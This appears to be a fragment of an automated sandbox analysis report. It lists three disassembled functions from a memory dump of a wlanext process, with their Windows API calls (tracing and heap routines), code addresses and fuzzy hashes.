                                                                                Function 00C0576C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • TraceMessage.ADVAPI32(?,?,0000002B,?,?,NULL,0000000A,?,00000004,00000000), ref: 00C057CE
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.923619276.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C00000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_c00000_wlanext.jbxd
                                                                                Similarity
                                                                                • API ID: MessageTrace
                                                                                • String ID: <NULL>$NULL
                                                                                • API String ID: 471583391-888386124
                                                                                • Opcode ID: cc64a4a6157ed801e841a96fa51ab55a629b43aebbdcba62901a771f6ec1394a
                                                                                • Instruction ID: 1729953fe3872aaa24029c4220060f64cfdb4172735cc47dafa0cc805b185973
                                                                                • Opcode Fuzzy Hash: cc64a4a6157ed801e841a96fa51ab55a629b43aebbdcba62901a771f6ec1394a
                                                                                • Instruction Fuzzy Hash: AF016D76A5060AEBEB159E08CC01FB7336AEB94710F58C011FA159A1D0EAB1DA91EB91
                                                                                Function 00C0B3B8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 44windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • TraceMessage.ADVAPI32(00000021,00C01610,0000002B,00C0B6EA,00C01634,NULL,0000000A,00000000,?,00C0B6EA,00C01634,00C01610,00000021,00C01D14,?), ref: 00C0B414
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.923619276.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C00000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_c00000_wlanext.jbxd
                                                                                Similarity
                                                                                • API ID: MessageTrace
                                                                                • String ID: <NULL>$NULL
                                                                                • API String ID: 471583391-888386124
                                                                                • Opcode ID: a4cba14d710ef205ed298f1bc6487997761528a0757436da8501a4dbef76c42c
                                                                                • Instruction ID: f4f6a2423224f391db317a2fc51eb5be450ebdd62bfda86faa127f76827406e6
                                                                                • Opcode Fuzzy Hash: a4cba14d710ef205ed298f1bc6487997761528a0757436da8501a4dbef76c42c
                                                                                • Instruction Fuzzy Hash: 04F0C27260020AEBDF219E458C46FB7772AEB94710F28C012FA655A5E1DBB1DF91D381
                                                                                Function 00C0ED03 Relevance: 5.1, APIs: 4, Instructions: 79memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetProcessHeap.KERNEL32(?,?,?,?,?,00C0E806,?,HtShrinkTable,000003AD), ref: 00C0ED1F
                                                                                • GetLastError.KERNEL32(?,?,00C0E806,?,HtShrinkTable,000003AD), ref: 00C0ED35
                                                                                • HeapFree.KERNEL32(00000000,00000000,?), ref: 00C0ED77
                                                                                • GetLastError.KERNEL32(?,?,00C0E806,?,HtShrinkTable,000003AD), ref: 00C0EDB5
                                                                                  • Part of subcall function 00C0EB72: TraceMessage.ADVAPI32(0000037A,?,0000002B,?,?,00C0E76B,00000005,?,00000004,0000037A,00000004,00000000,00000000,?,00C0EC87,00C01634), ref: 00C0EBBC
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.923619276.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 00C00000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_c00000_wlanext.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorHeapLast$FreeMessageProcessTrace
                                                                                • String ID:
                                                                                • API String ID: 782704287-0
                                                                                • Opcode ID: 112d1b42e397de5f192260921e4f9cedeaa31b9f2ed7c8eb964cb1b4941afa41
                                                                                • Instruction ID: 50ec1f1f7581b509458258d9128234f78131397e46d04408872452a9e018f8d8
                                                                                • Opcode Fuzzy Hash: 112d1b42e397de5f192260921e4f9cedeaa31b9f2ed7c8eb964cb1b4941afa41
                                                                                • Instruction Fuzzy Hash: 4E215771140305ABEF16AF45CC18FAA7BA6FF08344F244859FA525A1E2D772CAA1EF50